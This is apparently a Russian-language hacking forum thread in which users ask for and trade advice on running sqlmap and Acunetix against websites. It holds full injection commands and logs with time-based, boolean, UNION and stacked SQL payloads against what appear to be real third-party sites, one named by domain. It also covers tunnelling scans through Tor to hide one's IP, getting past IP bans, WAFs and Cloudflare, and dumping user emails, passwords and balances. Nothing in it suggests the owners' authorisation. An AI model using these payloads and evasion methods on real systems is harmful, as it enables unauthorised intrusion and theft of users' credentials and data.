Вопросы по SQLMap

Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала

1)Если нужна работа через тор
качаем privoxy_3.0.28
правим конфиг
forward-socks5t / 127.0.0.1:9150 .
forward-socks4 / 127.0.0.1:9150 .
forward-socks4a / 127.0.0.1:9150 .

12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy
и меняем на 127.0.0.1 порт 8118
13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)
Проверить работу можно отключив тор- сайт не будет сканится.

========================
чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор
Server tests:
Apache Tomcat AJP protocol audit
JMX and RMI
Java Debug Wire Protocol (JDWP) audit
Open SSL TLS Heartbleed
PHP Hash Collision DOS
TLS/SSL audit

Target Tests:
Apache Cassandra
FastGI Unauthorized Access
Memcached
Oracle Weblogic T3 XXE
Redis Unath
webLogic RCE
Apache Log4j socket
uWSGI

UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.

 

Подскажите пожалуйста в чем может быть проблема..
retrieving таблиц с начало норм шло

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Parameter: sort_by (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)



5:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] resumed: ai_tracking_visits_today
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] retrieving the length of query output
[15:06:37] [INFO] resumed: 10
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] resumed: ai_widgets
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] retrieving the length of query output
[15:06:37] [INFO] resumed: 19
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] resumed: ai_widgets_comments
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] retrieving the length of query output
[15:06:37] [INFO] resumed: 9
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] resumed: b?ppd?pp?
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] retrieving the length of query output
[15:06:37] [INFO] resumed: b?ppd?pp?
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] resumed: b?ppd?pp?
[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
[15:06:37] [INFO] retrieving the length of query output
[15:06:37] [INFO] resumed: b?ppd?pp?

А потом вот такая вот хрень пошла resumed: b?ppd?pp?
[15:11:36] [PAYLOAD] (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x687564736f6e61745f6169 LIMIT 62,1),10,1))>57) THEN 0x6966286e6f7728293d7379736461746528292c736c6565702830292c3029 ELSE (SELECT 8755 UNION SELECT 5075) END))
[15:11:38] [INFO] retrieved: b?ppd?pp?

Заранее спасибо.

 

Приветствую
Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

 

Используй прокси, пусти трафик через ТОР
Попробуй с того же IP, но почисти куки.

 

Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
Мой запрос

Code:

 users -C id,email,password,money  --dump

Мне допустим надо юзер с ID 123

 

[12:51:44] [INFO] fetching database names
[12:51:44] [INFO] fetching number of databases
[12:51:44] [PAYLOAD] -3870
you provided a HTTP Cookie header value, while target URL provides its own cooki
es within HTTP Set-Cookie header which intersect with yours. Do you want to merg
e them in further requests? [Y/n] Y
[12:51:44] [DEBUG] used the default behavior, running in batch mode
[12:51:45] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51-- tCKN
[12:51:47] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48-- tCKN
[12:51:53] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9-- tCKN
[12:51:54] [INFO] retrieved:
[12:51:54] [INFO] retrieved:


Кто сталкивался?

 

Параметры с которыми запускаешь SQLMAP? Параметр --batch всегда жмет за тебя Y, --charset=utf-8 присваивает кодировку в UTF-8. Попробуй так:

Code:

sqlmap -u http://site[.]ru/ --batch --charset=utf-8 --threads=10 --risk=3 --level=5 --dbs --random-agent --hex

 

Code:

[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times

[*] ending @ 19:29:32 /2021-02-19/

В чем проблема?

Code:

--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only

До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
Подскажите как быть?

Не обнаруживает базы данных

 

Теперь ищи реальный ИП сайта.Смотри DNS записи

 

Здравствуйте. Есть ссылка вида: http://site.com/index.php?id=image/quickview&host_id=2352
При запуске этой команды:

Code:

sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352"  --proxy-file=C:\proxy.txt  --threads=10 --timeout=180  --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment,space2hash,space2mysqlblank" --level 5 --risk 3 --dbs

Тамперы подставляются к image/quickview
Возможно ли как-то указать мапе, чтобы проверка шла через host_id=2352?

 

@polzunki

* - указатель точки инъекции

Code:

sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah

 

Благодарю. Вроде получилось, но по итогу получаю это:



URI parameter '#1*' is not injectable

Откуда берётся #1, если этого нет в таргете?

 

это означает, что в указанном параметре под номером 1 нет инъекции, то есть с помощью * можно указывать несколько параметров.
а если вы хотите увидеть, что отправляется в запросах, то добавьте ключ -v - Уровень вербальности: 1-6 (по умолчанию 1)
но лучше начните с мануала программы ( он есть и на русском ) или даже с этого!

 

Cорян за возможно глупый вопрос, просто не сталкивался со скулей в куках.
Как правильно кормить мапу?

 

Подскажите в чем проблема?

 

Сделай логирование в файл ( -t logfile.txt) и руками проверь запросы, может WAF на database() срабатывает

 

Приветствую. подскажите что не дает далее базу размотать.

Database: mysql
Table: Organization
[18 columns]
+------------------+---------+
| Column | Type |
+------------------+---------+
| aa | numeric |
| auid | numeric |
| chromosome_id | numeric |
| e_postaadres | numeric |
| evadres | numeric |
| fjalekalimi | numeric |
| ip | numeric |
| isbn | numeric |
| lastpost | numeric |
| main_module | numeric |
| mot_de_passe_bdd | numeric |
| myname | numeric |
| namaakun | numeric |
| ordernumber | numeric |
| parola | numeric |
| plugin_id | numeric |
| s_id | numeric |
| usr_n | numeric |
+------------------+---------+

sqlmap -u "https://10.10.10.10/index.php?action=login&controller=User" --host="site.test.com" --data="login=1'&password=g00dPa%24%24w0rD" --dbms=mysql -p login --risk 3 --random-agent -D mysql -T Organization -C mot_de_passe_bdd,parola,usr_n,s_id,e_postaadres,ip,lastpost -v3 --dump

выкидывает;
[13:50:52] [PAYLOAD] 1' AND (SELECT 9734 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM mysql.Organization),1,1))>9,0,5)))))yXMR)-- bIfc
[13:50:52] [INFO] retrieved:
[13:50:52] [DEBUG] performed 3 queries in 18.58 seconds
[13:50:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:50:52] [WARNING] unable to retrieve the number of column(s) 'e_postaadres,ip,lastpost,mot_de_passe_bdd,parola,s_id,usr_n' entries for table 'Organization' in database 'mysql'
[13:50:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.10'

[*] ending @ 13:50:52 /2021-03-22/

до таблиц дошел, а с колонками проблема . и подставлял --no-cast' or switch '--hex' идр.
Payload руками перебирать ,пока не сильно понимаю. прошу помощь

 

Добрый день! Подскажите плс в чем может быть проблема?

Code:

sqlmap.py --random-agent -u "http://site.com/ShoppingPage.asp?CateID=7" -v 3 --batch -D SkhlmcPTBankDB --dump --no-cast --tamper=between,randomcase,space2comment,luanginx --time-sec=10 --threads=10

Получаю следующие

Code:

[03:59:00] [DEBUG] cleaning up configuration parameters
[03:59:00] [INFO] loading tamper module 'between'
[03:59:00] [INFO] loading tamper module 'randomcase'
[03:59:00] [INFO] loading tamper module 'space2comment'
[03:59:00] [INFO] loading tamper module 'luanginx'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[03:59:00] [DEBUG] used the default behavior, running in batch mode
[03:59:00] [WARNING] using too many tamper scripts is usually not a good idea
[03:59:00] [DEBUG] setting the HTTP timeout
[03:59:00] [DEBUG] setting the HTTP User-Agent header
[03:59:00] [DEBUG] loading random HTTP User-Agent header(s) from file 'E:\sqlmap\data\txt\user-agents.txt'
[03:59:01] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty)' from file 'E:\sqlmap\data\txt\user-agents.txt'
[03:59:01] [DEBUG] creating HTTP requests opener object
[03:59:02] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:59:02] [DEBUG] resolving hostname 'eshop.antibac-intl.com'
[03:59:02] [INFO] testing connection to the target URL
[03:59:03] [DEBUG] declared web page charset 'utf-8'
you have not declared cookie(s), while server wants to set its own ('ASPSESSIONIDQCTCBDAQ=BEHFEANBBCL...JDFNEOLDOF'). Do you want to use those [Y/n] Y
[03:59:04] [DEBUG] used the default behavior, running in batch mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CateID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CateID=7' AND 4290=4290 AND 'EMyv'='EMyv
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: CateID=7' AND 1088 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1088=1088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'AjKx'='AjKx
    Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: CateID=7';WAITFOR DELAY '0:0:10'--
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: CateID=7' WAITFOR DELAY '0:0:10'--
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: CateID=7' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(69)+CHAR(111)+CHAR(72)+CHAR(84)+CHAR(86)+CHAR(122)+CHAR(108)+CHAR(74)+CHAR(103)+CHAR(102)+CHAR(101)+CHAR(111)+CHAR(119)+CHAR(67)+CHAR(87)+CHAR(99)+CHAR(88)+CHAR(108)+CHAR(97)+CHAR(115)+CHAR(101)+CHAR(65)+CHAR(66)+CHAR(116)+CHAR(85)+CHAR(119)+CHAR(88)+CHAR(115)+CHAR(70)+CHAR(84)+CHAR(112)+CHAR(71)+CHAR(89)+CHAR(85)+CHAR(82)+CHAR(83)+CHAR(98)+CHAR(118)+CHAR(109)+CHAR(109)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL-- jDXf
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
---
[03:59:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[03:59:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[03:59:04] [INFO] fetching tables for database: SkhlmcPTBankDB
[03:59:06] [DEBUG] resuming configuration option 'string' ('HK')
[03:59:06] [PAYLOAD] 7'/**/Union/**/AlL/**/SEleCT/**/nULl,nULl,nULl,nULl,nULl,nULl,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+(SEleCT/**/SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects.name/**/As/**/table_name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/innER/**/joiN/**/SkhlmcPTBankDB..sysusers/**/oN/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wHeRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))/**/FOr/**/JSoN/**/AUTO,/**/iNCLUDE_nULl_VALUES)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),nULl,nULl--/**/pqUM
[03:59:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:07] [PAYLOAD] 7'/**/UniOn/**/aLl/**/sElecT/**/nuLl,nuLl,nuLl,nuLl,nuLl,nuLl,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+COUNt(SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects.name/**/aS/**/table_name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),nuLl,nuLl/**/frOM/**/SkhlmcPTBankDB..sysobjects/**/inNEr/**/Join/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wHERE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))--/**/OJqX
[03:59:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:08] [WARNING] the SQL query provided does not return any output
[03:59:08] [PAYLOAD] 7
[03:59:10] [PAYLOAD] 7'/**/aNd/**/3241/**/iN/**/(seLECt/**/(CHaR(113)+CHaR(107)+CHaR(98)+CHaR(120)+CHaR(113)+(seLECt/**/COUnt(SkhlmcPTBankDB..sysusers.name+CHaR(46)+SkhlmcPTBankDB..sysobjects.name/**/aS/**/table_name)/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/iNNER/**/JOiN/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(CHaR(117),CHaR(118)))+CHaR(113)+CHaR(112)+CHaR(112)+CHaR(107)+CHaR(113)))/**/aNd/**/'qpCU'='qpCU
[03:59:11] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:11] [WARNING] the SQL query provided does not return any output
[03:59:12] [PAYLOAD] 7'/**/uNiOn/**/All/**/selEct/**/NUll,NUll,NUll,NUll,NUll,NUll,cHAR(113)+cHAR(107)+cHAR(98)+cHAR(120)+cHAR(113)+(selEct/**/table_schema+cHAR(46)+table_name/**/fROM/**/information_schema.tables/**/WHeRE/**/table_catalog=cHAR(83)+cHAR(107)+cHAR(104)+cHAR(108)+cHAR(109)+cHAR(99)+cHAR(80)+cHAR(84)+cHAR(66)+cHAR(97)+cHAR(110)+cHAR(107)+cHAR(68)+cHAR(66)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_NUll_VALUES)+cHAR(113)+cHAR(112)+cHAR(112)+cHAR(107)+cHAR(113),NUll,NUll--/**/XTJu
[03:59:12] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:13] [WARNING] reflective value(s) found and filtering out
[03:59:13] [PAYLOAD] 7'/**/unIOn/**/All/**/SElEcT/**/Null,Null,Null,Null,Null,Null,CHar(113)+CHar(107)+CHar(98)+CHar(120)+CHar(113)+(SElEcT/**/name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=CHar(85)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_Null_VALUES)+CHar(113)+CHar(112)+CHar(112)+CHar(107)+CHar(113),Null,Null--/**/oEuh
[03:59:14] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:14] [PAYLOAD] 7'/**/uNiOn/**/ALl/**/SElecT/**/Null,Null,Null,Null,Null,Null,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+COUnT(name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),Null,Null/**/FrOm/**/SkhlmcPTBankDB..sysobjects/**/Where/**/xtype=ChaR(85)--/**/jzSk
[03:59:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:15] [WARNING] the SQL query provided does not return any output
[03:59:15] [PAYLOAD] 7'/**/ANd/**/6591/**/In/**/(seLEct/**/(chAR(113)+chAR(107)+chAR(98)+chAR(120)+chAR(113)+(seLEct/**/CoUNT(name)/**/FROm/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=chAR(85))+chAR(113)+chAR(112)+chAR(112)+chAR(107)+chAR(113)))/**/ANd/**/'SuZW'='SuZW
[03:59:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:16] [WARNING] the SQL query provided does not return any output
[03:59:16] [INFO] fetching number of tables for database 'SkhlmcPTBankDB'
[03:59:16] [PAYLOAD] 7'/**/AnD/**/UniCODE(sUBstRInG((SeLeCt/**/ltriM(StR(cOUnT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(CHar(117),CHar(118))),1,1))/**/NOt/**/BETWEen/**/0/**/AnD/**/51/**/AnD/**/'dxUf'='dxUf
[03:59:17] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:17] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[03:59:17] [PAYLOAD] 7'/**/ANd/**/UnIcODe(sUbstRIng((SELeCT/**/LtRim(stR(cOunT(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wHeRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(ChAR(117),ChAR(118))),1,1))/**/Not/**/bEtwEeN/**/0/**/ANd/**/48/**/ANd/**/'dxUf'='dxUf
[03:59:18] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:18] [PAYLOAD] 7'/**/AnD/**/UnIcODE(SUBstRIng((sELect/**/LtRim(sTr(coUNt(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(chAr(117),chAr(118))),1,1))/**/NOt/**/bETweEN/**/0/**/AnD/**/9/**/AnD/**/'dxUf'='dxUf
[03:59:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:19] [INFO] retrieved:
[03:59:19] [DEBUG] performed 3 queries in 2.67 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[03:59:19] [DEBUG] used the default behavior, running in batch mode
[03:59:19] [PAYLOAD] 7'/**/iF(UNICOde(sUbstrInG((SELEcT/**/lTRiM(StR(Count(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/whERe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(cHAR(117),cHAR(118))),1,1))/**/noT/**/beTWeen/**/0/**/aND/**/51)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:19] [WARNING] time-based comparison requires larger statistical model, please wait.................. (done)
[03:59:35] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:35] [PAYLOAD] 7'/**/If(uNIcODE(SUbSTriNg((sELEct/**/LtrIM(stR(COunT(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/wHere/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChAr(117),ChAr(118))),1,1))/**/noT/**/betWEEN/**/0/**/AnD/**/48)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:59:36] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:36] [PAYLOAD] 7'/**/iF(UnicOdE(SubString((SElECt/**/lTRim(sTr(cOuNT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(Char(117),Char(118))),1,1))/**/Not/**/BEtwEEn/**/0/**/AnD/**/9)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:37] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:37] [INFO] retrieved:
[03:59:37] [DEBUG] performed 3 queries in 17.57 seconds
[03:59:37] [INFO] resumed: 0
[03:59:37] [DEBUG] performed 0 queries in 0.00 seconds
[03:59:37] [CRITICAL] unable to retrieve the tables for any database
[03:59:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times

 

WAF